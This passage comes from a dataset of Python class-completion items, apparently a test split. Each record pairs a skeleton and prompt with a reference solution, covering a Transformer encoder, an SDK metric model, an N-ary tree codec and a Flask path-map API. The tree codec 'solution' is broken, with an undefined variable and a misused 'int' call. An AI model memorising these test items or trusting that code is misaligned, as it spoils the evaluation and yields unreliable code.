def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforard dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n <|body_0|>\n\n def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n \"\"\"Pass the input through the endocder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n <|body_1|>\n\n def _reset_parameters(self):\n \"\"\"Initiate parameters in the transformer model.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TransformerEncoder:\n \"\"\"TransformerEncoder is a stack of N encoder layers.\"\"\"\n\n def __init__(self, input_size: int=512, d_model: int=512, nhead: int=8, num_layers: int=6, dim_feedforward: int=2048, dropout: float=0.1) -> None:\n \"\"\"Initialize the TransformerEncoder. Parameters --------- input_size : int The embedding dimension of the model. If different from d_model, a linear projection layer is added. d_model : int the number of expected features in encoder/decoder inputs. Default ``512``. nhead : int, optional the number of heads in the multiheadattention Default ``8``. num_layers : int the number of sub-encoder-layers in the encoder (required). Default ``6``. dim_feedforward : int, optional the inner feedforard dimension. Default ``2048``. dropout : float, optional the dropout percentage. Default ``0.1``.\"\"\"\n super().__init__()\n self.input_size = input_size\n self.d_model = d_model\n if input_size != d_model:\n self.proj = nn.Linear(input_size, d_model)\n layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n self.layers = nn.ModuleList([copy.deepcopy(layer) for _ in range(num_layers)])\n self.num_layers = num_layers\n self._reset_parameters()\n\n def forward(self, src: torch.Tensor, memory: Optional[torch.Tensor]=None, mask: Optional[torch.Tensor]=None, padding_mask: Optional[torch.Tensor]=None) -> torch.Tensor:\n \"\"\"Pass the input through the endocder layers in turn. Parameters ---------- src: torch.Tensor The sequence to the encoder (required). memory: torch.Tensor, optional Optional memory, unused by default. mask: torch.Tensor, optional The mask for the src sequence (optional). padding_mask: torch.Tensor, optional The mask for the src keys per batch (optional). Should be True for tokens to leave untouched, and False for padding tokens.\"\"\"\n output = src.transpose(0, 1)\n if self.input_size != self.d_model:\n output = self.proj(output)\n for i in range(self.num_layers):\n output = self.layers[i](output, memory=memory, src_mask=mask, padding_mask=padding_mask)\n return output.transpose(0, 1)\n\n def _reset_parameters(self):\n \"\"\"Initiate parameters in the transformer model.\"\"\"\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n", "source": "the_stack_v2_python_sparse", "source_path": "flambe/nn/transformer.py", "source_repo": "cle-ros/flambe", "split": "test", "star_events_count": 1} {"blob_id": "eddf2ead8fe6bd9a355f21e5ae1f12a83ed34bfa", "bodies": ["self.metric_name = metric_name\nself.timestamp_msecs = timestamp_msecs\nself.value = value", "if dictionary is None:\n return None\nmetric_name = dictionary.get('metricName')\ntimestamp_msecs = dictionary.get('timestampMsecs')\nvalue = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\nreturn cls(metric_name, timestamp_msecs, value)"], "bodies_text": "<|body_start_0|>\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.", "class_name": "MetricValue", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000270", "length_bytes": 2016, "license_type": "permissive", "methods": [{"docstring": "Constructor for the MetricValue class", "name": "__init__", "signature": "def __init__(self, metric_name=None, timestamp_msecs=None, value=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `MetricValue` described below.\n\nClass description:\nImplementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\n\nMethod signatures and docstrings:\n- def __init__(self, metric_name=None, timestamp_msecs=None, value=None): Constructor for the MetricValue class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `MetricValue` described below.\n\nClass description:\nImplementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\n\nMethod signatures and docstrings:\n- def __init__(self, metric_name=None, timestamp_msecs=None, value=None): Constructor for the MetricValue class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MetricValue:\n \"\"\"Implementation of the 'MetricValue' model. Specifies one data point of a metric. Attributes: metric_name (string): Specifies the metric name. timestamp_msecs (long|int): Specifies the creation time of a data point as a Unix epoch Timestamp (in milliseconds). value (Value): Specifies the value of the data point.\"\"\"\n\n def __init__(self, metric_name=None, timestamp_msecs=None, value=None):\n \"\"\"Constructor for the MetricValue class\"\"\"\n self.metric_name = metric_name\n self.timestamp_msecs = timestamp_msecs\n self.value = value\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n metric_name = dictionary.get('metricName')\n timestamp_msecs = dictionary.get('timestampMsecs')\n value = cohesity_management_sdk.models.value.Value.from_dictionary(dictionary.get('value')) if dictionary.get('value') else None\n return cls(metric_name, timestamp_msecs, value)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/metric_value.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "b643c161634586c58279fe7d882cae44c8e131ae", "bodies": ["if root is None:\n return ''\nq = []\n\ndef preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\npreorder(root)\nreturn ','.join(map(str, q))", "if data == '':\n return None\ndata = deque(data.split(','))\nroot = Node(int(data.popleft()), [])\n\ndef solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\nsolve(root)\nreturn root"], "bodies_text": "<|body_start_0|>\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000271", "length_bytes": 1377, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n<|end_body_1|>\n", "revision_id": "48ba21799f63225c104f649c3871444a29ab978a", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n if root is None:\n return ''\n q = []\n\n def preorder(root):\n if root is None:\n return None\n else:\n q.append(root.val)\n for child in (root, children):\n preorder(child)\n q.append('#')\n preorder(root)\n return ','.join(map(str, q))\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if data == '':\n return None\n data = deque(data.split(','))\n root = Node(int(data.popleft()), [])\n\n def solve(root):\n val = data.popleft()\n while val != '#':\n child = Node(int(val, []))\n solve(child)\n root.children.append(child)\n val = data.popleft()\n solve(root)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "archive/428. Serialize and Deserialize N-ary Tree.py", "source_repo": "doraemon1293/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "965bcf457c6d6c424f9bd74f8b96fc491108547e", "bodies": ["tagname = g.json.pop('tag', None)\nif tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\npathmap = PathMap(**g.json)\nif tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\ndb.session.add(pathmap)\ndb.session.commit()\nout = pathmap.to_dict(unpack_relationships=False)\nif pathmap.tag:\n out['tag'] = pathmap.tag.tag\nlogger.info('New pathmap created with values: %r', pathmap)\nreturn (jsonify(out), CREATED)", "query = PathMap.query\nfor_agent = get_uuid_argument('for_agent')\nif for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\nlogger.debug('Query: %s', str(query))\noutput = []\nfor map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\nreturn (jsonify(output), OK)"], "bodies_text": "<|body_start_0|>\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n<|end_body_0|>\n\n<|body_start_1|>\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "PathMapIndexAPI", "detected_licenses": ["BSD-3-Clause", "Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PathMapIndexAPI:\n\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n <|body_0|>\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n<|end_body_0|>\n\n<|body_start_1|>\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000272", "length_bytes": 11366, "license_type": "permissive", "methods": [{"docstring": "A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a", "name": "post", "signature": "def post(self)"}, {"docstring": "A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error", "name": "get", "signature": "def get(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002449", "prompt": "Implement the Python class `PathMapIndexAPI` described below.\n\nClass description:\nImplement the PathMapIndexAPI class.\n\nMethod signatures and docstrings:\n- def post(self): A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\n- def get(self): A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error", "prompted_full_text": "Implement the Python class `PathMapIndexAPI` described below.\n\nClass description:\nImplement the PathMapIndexAPI class.\n\nMethod signatures and docstrings:\n- def post(self): A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\n- def get(self): A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\n\n<|skeleton|>\nclass PathMapIndexAPI:\n\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n <|body_0|>\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tagname = g.json.pop('tag', None)\n if tagname:\n if not isinstance(tagname, STRING_TYPES):\n return (jsonify(error='tag must be of type string'), BAD_REQUEST)\n pathmap = PathMap(**g.json)\n if tagname:\n tag = Tag.query.filter_by(tag=tagname).first()\n if not tag:\n tag = Tag(tag=tagname)\n db.session.add(tag)\n pathmap.tag = tag\n db.session.add(pathmap)\n db.session.commit()\n out = pathmap.to_dict(unpack_relationships=False)\n if pathmap.tag:\n out['tag'] = pathmap.tag.tag\n logger.info('New pathmap created with values: %r', pathmap)\n return (jsonify(out), CREATED)\n<|end_body_0|>\n\n<|body_start_1|>\n query = PathMap.query\n for_agent = get_uuid_argument('for_agent')\n if for_agent:\n query = query.filter(or_(PathMap.tag == None, PathMap.tag.has(Tag.agents.any(Agent.id == for_agent))))\n logger.debug('Query: %s', str(query))\n output = []\n for map in query:\n map_dict = map.to_dict(unpack_relationships=False)\n if map.tag:\n map_dict['tag'] = map.tag.tag\n del map_dict['tag_id']\n output.append(map_dict)\n return (jsonify(output), OK)\n<|end_body_1|>\n", "revision_id": "ea04bbcb807eb669415c569417b4b1b68e75d29d", "skeleton": "<|skeleton|>\nclass PathMapIndexAPI:\n\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will be transparently created. .. http:post:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http POST /api/v1/pathmaps/ HTTP/1.1 Accept: application/json { \"path_linux\": \"/mnt/nfs\", \"path_windows\": \"\\\\domain\\\\cifs_server\", \"path_osx\": \"/mnt/nfs\", \"tag\": \"production\" } **Response** .. sourcecode:: http HTTP/1.1 201 CREATED Content-Type: a\"\"\"\n <|body_0|>\n\n def get(self):\n \"\"\"A ``GET`` to this endpoint will return a list of all registered path maps, with id. It can be made with a for_agent query parameter, in which case it will return only those path maps that apply to that agent. .. http:get:: /api/v1/pathmaps/ HTTP/1.1 **Request** .. sourcecode:: http GET /api/v1/pathmaps/ HTTP/1.1 Accept: application/json **Response** .. sourcecode:: http HTTP/1.1 200 OK Content-Type: application/json [ { \"id\": 1, \"path_osx\": \"/mnt/nfs\", \"path_windows\": \"\\\\\\\\domains\\\\cifs_server\", \"path_linux\": \"/mnt/nfs\" }, { \"id\": 7, \"path_osx\": \"/renderout\", \"path_windows\": \"c:\\\\renderout\", \"path_linux\": \"/renderout\" \"tag\": \"usual\", } ] :statuscode 200: no error\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PathMapIndexAPI:\n def post(self):\n \"\"\"A ``POST`` to this endpoint will create a new path map. A path map will list the equivalent path prefixes for all three supported families of operating systems, Linux, Windows and OS X. A path map can optionally be restricted to one tag, in which case it will only apply to agents with that tag. If a tag is specified that does not exist yet, that tag will 